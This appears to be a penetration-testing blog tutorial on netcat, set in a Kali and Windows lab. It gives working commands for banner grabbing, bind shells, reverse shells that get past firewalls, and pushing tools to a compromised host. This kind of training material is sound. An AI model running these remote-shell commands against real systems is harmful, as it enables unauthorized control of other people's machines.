Welcome back hackers! In this article, I will provide instruction on utilizing the awesome power of netcat. Commonly dubbed the swiss army knife of the hacker’s toolkit, netcat can do many things that are of use to hackers. After reading this article, you will learn how to perform the following functions using netcat:
- Establish a simple chat room.
- Perform Banner Grabbing.
- Establish bind and reverse shells.
- Transfer files between Kali and target.
So first things first – what is netcat exactly? At its simplest, netcat is a tool that is capable of reading and writing data across a network using TCP or UDP as its transport protocol. Netcat is of great use to hackers because it allows us to quickly and easily setup network connections for many different tasks and situations. We will examine netcat’s capabilities through several examples. But first, let’s make sure you setup your lab environment.
You will require two systems to practice these exercises. I recommend the following:
Kali Linux VM – netcat is pre-installed so no downloads/installation required
Windows OS VM or Host – netcat is not installed by default on Windows systems, so you will have to download it from: https://joncraton.org/files/nc111nt.zip
Be advised that the Windows firewall will often block unsolicited network traffic. If these exercises are not working correctly, you may need to disable your firewall or add an exception.
Starting a Simple Chat Session
To illustrate how netcat works, we’ll start by setting up a simple chat session.
- Use netcat on Kali to start chat server.
root@kali2:~# nc -nlvvp 1234
-n requires that an IP address is entered rather than a hostname. DNS resolution will not be performed.
-l places netcat into “listen mode”, meaning it is listening for inbound connections. In this instance, your Kali system is functioning as the chat server.
-vv places netcat in double verbose mode, for detailed command line feedback.
-p specifies the listening port, in this case 1234.
2. Connect to chat server from Windows system.
C:\nc.exe -nvv [KALI IP Address] 1234
You should now have a simple chat server established. Type in your Kali system and observe the text output on your Windows system. Press ctrl+c to terminate the session.
Perform Banner Grabbing
Banner grabbing is the act of connecting to a network service in order to elicit information about it. Let’s see this in action.
- Start the Apache web service on Kali. This is the service we’ll “banner grab.”
root@kali:~# service apache2 start
2. Grab Apache banner using netcat. Notice that we are connecting to ourselves by using the loopback address (127.0.0.1).
root@kali:~# nc -nv 127.0.0.1 80
3. Once connection is established, enter some random key strokes and hit enter.
4. Examine the response. In the header information, we are presented with the version of the running Apache service:
<address>Apache/2.4.10 (Debian) Server at 127.0.1.1 Port 80</address>
This technique is vitally useful. Knowing the application version enables you to perform exploit research specific to the application running on your target. Try seraching the exploit-db and see if any exploit code exists for your version of Apache.
Establishing a Bind Shell
One of the most useful capabilities of netcat is its ability to redirect command input/output across a network. We will use this feature to establish a bind shell, which will enable us to remotely control the Windows platform from Kali. For this exercise, think of a bind shell as “the attacker connecting directly to the victim.”
NOTE: You will likely need to disable the Windows firewall to perform this exercise.
- Prepare netcat listener on Windows system. Notice that we are listening on port 1234. When a connection is established, the -e option will execute the cmd.exe command and redirect its input and output across the network, enabling us, the attacker, to remotely control the system.
C:\ nc.exe -nlvp 1234 -e cmd.exe
2. Connect to Windows system from Kali.
root@kali:~# nc -nv [Windows IP address] 1234
If performed correctly, you will be presented with a shell and can now remotely enter commands as if you were physically on the Windows system. You can do the exact same thing on Linux systems substituting /bin/bash for cmd.exe.
Establishing a Reverse Shell
One of the problems with bind shells is that they tend to be blocked by firewalls as unsolicited connections. A reverse shell circumvents this protection because it appears that the user initiated the connection. To clarify, a reverse shell can simply be thought as “the victim connecting to the attacker,” which usually has the effect of bypassing firewall restrictions. Let’s see this in actions.
Note: To add realism to this exercise, try it with the Windows firewall enabled.
- Establish netcat listener from Kali on TCP port 4321.
root@kali:~# nc -nlvp 4321
2. Establish reverse shell connection from Windows.
C:\nc.exe -nvv [Kali IP] 4321 -e cmd.exe
You should now have a shell, despite the presence of an active firewall. Nice!
Transferring Files with Netcat
I have been on many engagements where, after gaining an initial shell, I needed to utilize additional tools that were not already present on the file system to perform tasks such as privilege escalation, password dumping, etc. Netcat can help us in this regard by enabling us to transfer files from one system to another. For this exercise, we will attempt to transfer “whoami.exe” from Kali to Windows.
1. Prepare Windows to receive file via netcat.
C:\nc.exe -nlvp 4444 > whoami.exe
2. Push file from Kali to Windows.
root@kali:~# cd /usr/share/windows-binaries/
root@kali:~# nc -nv [Windows IP] 4444 < whoami.exe
Notice that you do not receive feedback from netcat about the file transfer. You must wait a minute or two before closing the connection and verifying that your file is present. Once complete, try running whoami.exe from command line.
In this article we reviewed how to use netcat to start a chat session, perform banner grabbing, establish bind/reverse shells, and transfer files. Mastering these basic tasks will arm you with the skills needed to become a proficient hacker/penetration tester. Next week we will examine deploying netcat payloads in simple remote access exploits.
To conclude this article, I have several exercises for you to confirm your mastery of the subject matter. Practice the exercises until you can perform them quickly from memory.
- Banner Grabbing: Start the SSH service on your kali system (service ssh start), then banner grab TCP port 22. What version of SSH is your Kali system running? Google it to research any published exploits or documented vulnerabilities.
- Bind Shell: Establish a bind shell from Kali to Windows and Windows to Kali. Experiment with and without firewalls. Understand how a firewall impedes your bind shell.
- Reverse Shell: Establish a reverse shell from Windows to Kali and then Kali to Windows. Try this task with the Windows firewall enabeled. Did it work?
- File Transfer: Practice transferring files from Kali to Windows and Windows to Kali.
Try the above exercise while running a packet capture through Wireshark or TCPDump. What do you notice about your traffic? Is it encrypted? Why might this be a problem?
Research the tool “ncat” and learn how to encrypt your traffic with SSL. Try replicating all of the above exercises using ncat with SSL encryption enabled. Use Wireshark or TCPDump to sniff the traffic. Is it encrypted? How might this be beneficial?